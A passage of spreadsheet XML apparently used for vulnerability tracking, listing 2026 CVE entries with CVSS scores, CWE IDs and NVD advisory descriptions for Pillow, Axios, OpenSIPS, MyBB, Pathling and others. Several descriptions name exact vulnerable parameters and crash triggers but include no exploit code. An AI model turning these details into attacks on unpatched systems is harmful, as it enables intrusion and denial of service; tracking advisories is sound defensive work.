      <c r="I1112" s="5" t="inlineStr">
        <is>
          <t>2026-04-15</t>
        </is>
      </c>
      <c r="J1112" s="5" t="inlineStr"/>
      <c r="K1112" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-409, CWE-770</t>
        </is>
      </c>
      <c r="L1112" s="5" t="inlineStr">
        <is>
          <t>Pillow is a Python imaging library. Versions 10.3.0 through 12.1.1 did not limit the amount of GZIP-compressed data read when decoding a FITS image, making them vulnerable to decompression bomb attacks. A specially crafted FITS file could cause unbounded memory consumption, leading to denial of service (OOM crash or severe performance degradation). If users are unable to immediately upgrade, they should only open specific image formats, excluding FITS, as a workaround.</t>
        </is>
      </c>
      <c r="M1112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40192</t>
        </is>
      </c>
    </row>
    <row r="1113">
      <c r="A1113" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40877</t>
        </is>
      </c>
      <c r="C1113" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1113" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1113" s="5" t="inlineStr"/>
      <c r="F1113" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1113" s="5" t="inlineStr"/>
      <c r="H1113" s="5" t="inlineStr"/>
      <c r="I1113" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J1113" s="5" t="inlineStr"/>
      <c r="K1113" s="5" t="inlineStr">
        <is>
          <t>CWE-502, CWE-94</t>
        </is>
      </c>
      <c r="L1113" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web-based IT service management tool. Prior to 3.2.3, iTop is vulnerable to PHP object injection in the user preference functionality, which can lead to remote code execution. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M1113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40877</t>
        </is>
      </c>
    </row>
    <row r="1114">
      <c r="A1114" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41453</t>
        </is>
      </c>
      <c r="C1114" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1114" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1114" s="5" t="inlineStr"/>
      <c r="F1114" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1114" s="5" t="inlineStr"/>
      <c r="H1114" s="5" t="inlineStr"/>
      <c r="I1114" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1114" s="5" t="inlineStr"/>
      <c r="K1114" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1114" s="5" t="inlineStr">
        <is>
          <t>Krayin CRM before 2.2.4 contains a blind SQL injection vulnerability in the leads DataGrid that allows authenticated users with leads access to inject arbitrary SQL into a HAVING clause by manipulating the rotten_lead[in] query parameter, which is concatenated without parameterized binding directly into a havingRaw() call in LeadDataGrid.php. Attackers can exploit this flaw using time-based and boolean-based blind injection techniques to extract the entire database contents, including user credential hashes, CRM records, and application configuration data.</t>
        </is>
      </c>
      <c r="M1114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41453</t>
        </is>
      </c>
    </row>
    <row r="1115">
      <c r="A1115" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41674</t>
        </is>
      </c>
      <c r="C1115" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1115" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1115" s="5" t="inlineStr"/>
      <c r="F1115" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1115" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1115" s="5" t="inlineStr"/>
      <c r="I1115" s="5" t="inlineStr">
        <is>
          <t>2026-05-07</t>
        </is>
      </c>
      <c r="J1115" s="5" t="inlineStr"/>
      <c r="K1115" s="5" t="inlineStr">
        <is>
          <t>CWE-91</t>
        </is>
      </c>
      <c r="L1115" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) `DOMParser` and `XMLSerializer` module. In @xmldom/xmldom prior to versions 0.9.10 and 0.8.13 and xmldom version 0.6.0 and prior, the package serializes DocumentType node fields (internalSubset, publicId, systemId) verbatim without any escaping or validation. When these fields are set programmatically to attacker-controlled strings, XMLSerializer.serializeToString can produce output where the DOCTYPE declaration is terminated early and arbitrary markup appears outside it. This issue has been patched in versions @xmldom/xmldom versions 0.9.10 and 0.8.13.</t>
        </is>
      </c>
      <c r="M1115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41674</t>
        </is>
      </c>
    </row>
    <row r="1116">
      <c r="A1116" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44494</t>
        </is>
      </c>
      <c r="C1116" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1116" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1116" s="5" t="inlineStr"/>
      <c r="F1116" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G1116" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1116" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I1116" s="5" t="inlineStr">
        <is>
          <t>2026-06-11</t>
        </is>
      </c>
      <c r="J1116" s="5" t="inlineStr"/>
      <c r="K1116" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-441, CWE-915</t>
        </is>
      </c>
      <c r="L1116" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. From 1.0.0 to before 1.16.0, the Axios library is vulnerable to a Prototype Pollution "Gadget" attack that allows any Object.prototype pollution in the application's dependency tree to be escalated into a full Man-in-the-Middle (MITM) attack — intercepting, reading, and modifying all HTTP traffic including authentication credentials. The HTTP adapter at lib/adapters/http.js:670 reads config.proxy via standard property access, which traverses the prototype chain. Because proxy is not present in Axios defaults, the merged config object has no own proxy property, making it trivially injectable via prototype pollution. Once injected, setProxy() routes all HTTP requests through the attacker's proxy server. This vulnerability is fixed in 1.16.0.</t>
        </is>
      </c>
      <c r="M1116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44494</t>
        </is>
      </c>
    </row>
    <row r="1117">
      <c r="A1117" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45084</t>
        </is>
      </c>
      <c r="C1117" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1117" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1117" s="5" t="inlineStr"/>
      <c r="F1117" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1117" s="5" t="inlineStr"/>
      <c r="H1117" s="5" t="inlineStr"/>
      <c r="I1117" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1117" s="5" t="inlineStr"/>
      <c r="K1117" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L1117" s="5" t="inlineStr">
        <is>
          <t>OpenSIPS is a Session Initiation Protocol (SIP) server implementation. Versions 3.4.0 through 3.6.5 contain a denial of service vulnerability in the presence module. When the presence module's handle_publish() function processes a SIP PUBLISH request with an Event: presence header and a message body while the configuration option enable_sphere_check=1 is set, it invokes the get_content_type() macro without first calling parse_content_type_hdr(), causing it to dereference uninitialized or NULL Content-Type parsing state and crash. If a Content-Type header is present but unparsed, msg-&gt;content_type-&gt;parsed is NULL and is dereferenced as a content_t pointer; if the request lacks a Content-Type header entirely, msg-&gt;content_type itself is NULL, and both cases lead to a crash. A remote attacker can therefore cause a denial of service against an affected instance with a single PUBLISH request over UDP or TCP, using either a valid Content-Type: application/pidf+xml request or one with the header removed, and the vulnerable code path itself does not enforce authentication (though a deployment's routing configuration may require it before this route is reached). The issue has been fixed in version 3.6.6 and 4.0.0-rc1.</t>
        </is>
      </c>
      <c r="M1117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45084</t>
        </is>
      </c>
    </row>
    <row r="1118">
      <c r="A1118" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45115</t>
        </is>
      </c>
      <c r="C1118" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1118" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1118" s="5" t="inlineStr"/>
      <c r="F1118" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1118" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1118" s="5" t="inlineStr"/>
      <c r="I1118" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1118" s="5" t="inlineStr"/>
      <c r="K1118" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1118" s="5" t="inlineStr">
        <is>
          <t>MyBB is free and open source forum software. Prior to 1.8.40, the Buddy/Ignore component does not sanitize usernames correctly, allowing attackers to perform JavaScript code injection through a specially crafted username. The User CP Buddy/Ignore list and the Select Buddies list in Private Messages pass usernames through htmlspecialchars_uni(), which may leave single quotes unescaped. The payload is triggered when a victim chooses Yes in Please Confirm while removing the username in usercp.php, or selects the username through the onclick handler in the xmlhttp.php Select Buddies popup. The uniquely identifying implementation details include Private Messages Select Buddies list, and unescaped single quotes. This issue is fixed in version 1.8.40.</t>
        </is>
      </c>
      <c r="M1118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45115</t>
        </is>
      </c>
    </row>
    <row r="1119">
      <c r="A1119" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45116</t>
        </is>
      </c>
      <c r="C1119" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1119" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1119" s="5" t="inlineStr"/>
      <c r="F1119" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1119" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1119" s="5" t="inlineStr"/>
      <c r="I1119" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1119" s="5" t="inlineStr"/>
      <c r="K1119" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1119" s="5" t="inlineStr">
        <is>
          <t>MyBB is free and open source forum software. Prior to 1.8.40, the user datahandler does not properly validate checkbox and multiselect profile field types, resulting in stored JavaScript code injection. UserDataHandler::verify_profile_fields() only performs the specialized validation when is_array($profile_fields[$field]) is true. A non-array profile_fields[fidX] value instead of the expected profile_fields[fidX][] shape falls through to generic text handling and is stored without verification. The affected value is then rendered directly by member.php and inc/functions_post.php rather than processed by the MyCode parser. The uniquely identifying implementation details include inc/datahandlers/user.php. This issue is fixed in version 1.8.40.</t>
        </is>
      </c>
      <c r="M1119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45116</t>
        </is>
      </c>
    </row>
    <row r="1120">
      <c r="A1120" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45273</t>
        </is>
      </c>
      <c r="C1120" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1120" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1120" s="5" t="inlineStr"/>
      <c r="F1120" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1120" s="5" t="inlineStr"/>
      <c r="H1120" s="5" t="inlineStr"/>
      <c r="I1120" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1120" s="5" t="inlineStr"/>
      <c r="K1120" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1120" s="5" t="inlineStr">
        <is>
          <t>MyBooks is an ebook management web server also known as Talebook. In 3.41.2 and earlier, the AdminSettings.post handler for POST /api/admin/settings in webserver/handlers/admin.py applies the auth decorator but does not check the self.admin_user property, unlike the corresponding GET handler. Any authenticated regular user can therefore overwrite server configuration values including SMTP credentials, OAuth client secrets, storage paths, security feature flags, and autoreload settings. The process_auth_header function in webserver/handlers/base.py also fails to verify the matched account's active flag, allowing a registered but unactivated account to authenticate and reach the vulnerable handler. Exploitation can disclose secrets through configuration access paths, sabotage application behavior, force service restarts, and supply the settings needed for related code-injection attacks. This issue is fixed in version 3.42.0.</t>
        </is>
      </c>
      <c r="M1120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45273</t>
        </is>
      </c>
    </row>
    <row r="1121">
      <c r="A1121" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45809</t>
        </is>
      </c>
      <c r="C1121" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1121" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1121" s="5" t="inlineStr"/>
      <c r="F1121" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1121" s="5" t="inlineStr"/>
      <c r="H1121" s="5" t="inlineStr"/>
      <c r="I1121" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J1121" s="5" t="inlineStr"/>
      <c r="K1121" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1121" s="5" t="inlineStr">
        <is>
          <t>OpenSIPS is a Session Initiation Protocol (SIP) server implementation. Versions prior to 3.6.6 and 4.0.0-rc1 contain a denial of service vulnerability in the watcherinfo generation functionality. An attacker can create an oversized watcher entry by sending a SUBSCRIBE Event: presence request with a long From URI, and then trigger presence.winfo watcherinfo XML generation for the same presentity. OpenSIPS copies the stored watcher URI into a fixed-size stack buffer, overflowing it and crashing the process. A remote attacker can crash an OpenSIPS worker in deployments that expose handle_subscribe() and allow watcherinfo (presence.winfo) generation. The issue is configuration-dependent because the presence and presence_xml modules must be loaded and SUBSCRIBE routing must be reachable. This issue has been fixed in versions 3.6.6 and 4.0.0-rc1.</t>
        </is>
      </c>
      <c r="M1121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45809</t>
        </is>
      </c>
    </row>
    <row r="1122">
      <c r="A1122" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46334</t>
        </is>
      </c>
      <c r="C1122" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1122" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1122" s="5" t="inlineStr"/>
      <c r="F1122" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1122" s="5" t="inlineStr"/>
      <c r="H1122" s="5" t="inlineStr"/>
      <c r="I1122" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J1122" s="5" t="inlineStr"/>
      <c r="K1122" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-476</t>
        </is>
      </c>
      <c r="L1122" s="5" t="inlineStr">
        <is>
          <t>OpenSIPS is a Session Initiation Protocol (SIP) server implementation. Versions prior to 3.6.6 and 4.0.0-rc1 contain a denial of service vulnerability in the SDP bandwidth-line parsing logic. A SIP request with Content-Type: application/sdp and a malformed session-level SDP bandwidth line missing the required colon delimiter can corrupt parsed SDP bandwidth metadata. When a route or module subsequently clones the corrupted SDP state, as occurs with dialog and QoS processing, the OpenSIPS worker process crashes. An unauthenticated remote attacker can therefore trigger a crash in any configuration whose routing script parses attacker-controlled SDP and applies dialog/QoS processing. This issue has been fixed in versions 3.6.6 and 4.0.0-rc1.</t>
        </is>
      </c>
      <c r="M1122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46334</t>
        </is>
      </c>
    </row>
    <row r="1123">
      <c r="A1123" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46382</t>
        </is>
      </c>
      <c r="C1123" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1123" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1123" s="5" t="inlineStr"/>
      <c r="F1123" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1123" s="5" t="inlineStr"/>
      <c r="H1123" s="5" t="inlineStr"/>
      <c r="I1123" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1123" s="5" t="inlineStr"/>
      <c r="K1123" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1123" s="5" t="inlineStr">
        <is>
          <t>The Meeting Room Booking System (MRBS) is a PHP-based application for booking meeting rooms. Prior to version 1.12.2, a user-supplied private/local URI can be made to be fetched without checks. Version 1.12.2 contains a fix. No known workarounds are available.</t>
        </is>
      </c>
      <c r="M1123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46382</t>
        </is>
      </c>
    </row>
    <row r="1124">
      <c r="A1124" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46384</t>
        </is>
      </c>
      <c r="C1124" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1124" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1124" s="5" t="inlineStr"/>
      <c r="F1124" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1124" s="5" t="inlineStr"/>
      <c r="H1124" s="5" t="inlineStr"/>
      <c r="I1124" s="5" t="inlineStr">
        <is>
          <t>2026-05-29</t>
        </is>
      </c>
      <c r="J1124" s="5" t="inlineStr"/>
      <c r="K1124" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L1124" s="5" t="inlineStr">
        <is>
          <t>iskorotkov/avro is a fast Go Avro codec. Prior to 2.33.0, several Avro decoder paths read attacker-controlled 64-bit values from the wire format and either narrowed them to platform-sized int before bounds-checking, or summed them with overflow-prone signed-int arithmetic. On 32-bit targets (GOARCH=386, arm, mips, wasm, etc.), the truncation paths can silently bypass byte-slice limits, select the wrong union branch, or hit the OCF negative-make panic via wrap. Three sub-issues are not 32-bit-specific: cumulative-size arithmetic overflow in arrayDecoder.Decode / mapDecoder.Decode / mapDecoderUnmarshaler.Decode (wraps at math.MaxInt64 on amd64 / arm64 and bypasses MaxSliceAllocSize / MaxMapAllocSize), math.MinInt negation in block-header handling, and make([]byte, size) with a negative size in OCF block reads — all three panic or bypass caps on any platform, giving an attacker a denial-of-service primitive there. This vulnerability is fixed in 2.33.0.</t>
        </is>
      </c>
      <c r="M1124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46384</t>
        </is>
      </c>
    </row>
    <row r="1125">
      <c r="A1125" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46385</t>
        </is>
      </c>
      <c r="C1125" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1125" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1125" s="5" t="inlineStr"/>
      <c r="F1125" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1125" s="5" t="inlineStr"/>
      <c r="H1125" s="5" t="inlineStr"/>
      <c r="I1125" s="5" t="inlineStr">
        <is>
          <t>2026-05-29</t>
        </is>
      </c>
      <c r="J1125" s="5" t="inlineStr"/>
      <c r="K1125" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-835</t>
        </is>
      </c>
      <c r="L1125" s="5" t="inlineStr">
        <is>
          <t>iskorotkov/avro is a fast Go Avro codec. Prior to 2.33.0, the Avro array and map decoders looped over an attacker-controlled block-count value without checking the underlying reader's error state inside the loop body. Reader.ReadBlockHeader returns the count as a Go int, which is 64-bit on amd64 / arm64 targets — so a producer can declare a block of up to math.MaxInt64 (~9.2 × 10¹⁸) elements followed by EOF (or any truncated payload), and the decoder will attempt that many no-op iterations before propagating the error. The realistic ceiling is "indefinite until the worker is killed externally" — a single hostile payload pins a CPU core until the process is OOM-killed, deadline-cancelled, or terminated. Remote, unauthenticated denial-of-service. This vulnerability is fixed in 2.33.0.</t>
        </is>
      </c>
      <c r="M1125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46385</t>
        </is>
      </c>
    </row>
    <row r="1126">
      <c r="A1126" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46636</t>
        </is>
      </c>
      <c r="C1126" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1126" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1126" s="5" t="inlineStr"/>
      <c r="F1126" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1126" s="5" t="inlineStr"/>
      <c r="H1126" s="5" t="inlineStr"/>
      <c r="I1126" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1126" s="5" t="inlineStr"/>
      <c r="K1126" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L1126" s="5" t="inlineStr">
        <is>
          <t>Twig is a template language for PHP. From version 1.0.0 to before version 3.27.0, SecurityPolicy::checkMethodAllowed() unconditionally whitelists all method calls on instances of Twig\Markup. Twig\Markup is not final, so subclasses inherit the bypass. An application that passes an object of a Markup-derived class into a sandboxed template (typically to mark a chunk of HTML as safe) inadvertently exposes every public method of that subclass to template authors, regardless of the configured allowedMethods list. This issue has been patched in version 3.27.0.</t>
        </is>
      </c>
      <c r="M1126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46636</t>
        </is>
      </c>
    </row>
    <row r="1127">
      <c r="A1127" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47659</t>
        </is>
      </c>
      <c r="C1127" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1127" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1127" s="5" t="inlineStr"/>
      <c r="F1127" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1127" s="5" t="inlineStr"/>
      <c r="H1127" s="5" t="inlineStr"/>
      <c r="I1127" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J1127" s="5" t="inlineStr"/>
      <c r="K1127" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-918</t>
        </is>
      </c>
      <c r="L1127" s="5" t="inlineStr">
        <is>
          <t>Pathling is a set of tools that make it easier to use FHIR and clinical terminology within health data analytics. Prior to version 2.0.0 of Pathling Server, Pathling's `/$result` endpoint allows a caller who can obtain any valid async export job ID to supply `file` parameter values containing path traversal sequences. The handler verifies only the supplied `job` and never normalises or confines the requested `file` path to that job's `jobs/&lt;jobId&gt;` directory before opening it as a filesystem resource. Because async export scratch space lives under the same warehouse database root as persisted resource tables, an attacker can use their own export job to read other files from the warehouse. This is fixed in Pathling Server 2.0.0. The `$result` handler now resolves and canonicalizes the requested file path and rejects any request that escapes the job's `jobs/&lt;jobId&gt;` directory. As an interim mitigation, disable the async export operations (`pathling.operations.exportEnabled`, `patientExportEnabled`, `groupExportEnabled`, `bulkSubmitEnabled`) or enable authentication and restrict export capability to trusted callers.</t>
        </is>
      </c>
      <c r="M1127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47659</t>
        </is>
      </c>
    </row>
    <row r="1128">
      <c r="A1128" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47660</t>
        </is>
      </c>
      <c r="C1128" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1128" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1128" s="5" t="inlineStr"/>
      <c r="F1128" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1128" s="5" t="inlineStr"/>
      <c r="H1128" s="5" t="inlineStr"/>
      <c r="I1128" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J1128" s="5" t="inlineStr"/>
      <c r="K1128" s="5" t="inlineStr">
        <is>
          <t>CWE-522, CWE-918</t>
        </is>
      </c>
      <c r="L1128" s="5" t="inlineStr">
        <is>
          <t>Pathling is a set of tools that make it easier to use FHIR and clinical terminology within health data analytics. Prior to version 2.0.0 of Pathling Server, Pathling's bulk-submit operation allows an allowed submitter to supply an explicit `oauthMetadataUrl` parameter that is not validated against `pathling.bulkSubmit.allowableSources`. When present, the bulk-submit OAuth flow trusts metadata and the returned `token_endpoint` from the caller-chosen location, then builds outbound OAuth client authentication directly from the submitter's stored credentials. This is fixed in Pathling Server 2.0.0.</t>
        </is>
      </c>
      <c r="M1128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47660</t>
        </is>
      </c>
    </row>
    <row r="1129">
      <c r="A1129" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47661</t>
        </is>
      </c>
      <c r="C1129" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1129" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1129" s="5" t="inlineStr"/>
      <c r="F1129" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1129" s="5" t="inlineStr"/>
      <c r="H1129" s="5" t="inlineStr"/>
      <c r="I1129" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J1129" s="5" t="inlineStr"/>
      <c r="K1129" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1129" s="5" t="inlineStr">
        <is>
          <t>Pathling is a set of tools that make it easier to use FHIR and clinical terminology within health data analytics. Prior to version 2.0.0 of Pathling Server, Pathling's `/$result` endpoint allows a caller who can obtain any valid async export job ID to supply `file` parameter values containing path traversal sequences. The handler verifies only the supplied `job` and never normalises or confines the requested `file` path to that job's `jobs/&lt;jobId&gt;` directory before opening it as a filesystem resource. Because async export scratch space lives under the same warehouse database root as persisted resource tables, an attacker can use their own export job to read other files from the warehouse. This is fixed in Pathling Server 2.0.0. As an interim mitigation, disable the async export operations (`pathling.operations.exportEnabled`, `patientExportEnabled`, `groupExportEnabled`, `bulkSubmitEnabled`) or enable authentication and restrict export capability to trusted callers.</t>
        </is>
      </c>
      <c r="M1129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47661</t>
        </is>
      </c>
    </row>
    <row r="1130">
      <c r="A1130" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47662</t>
        </is>
      </c>
      <c r="C1130" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1130" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1130" s="5" t="inlineStr"/>
      <c r="F1130" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1130" s="5" t="inlineStr"/>
      <c r="H1130" s="5" t="inlineStr"/>
      <c r="I1130" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J1130" s="5" t="inlineStr"/>
      <c r="K1130" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-522, CWE-918</t>
        </is>
      </c>
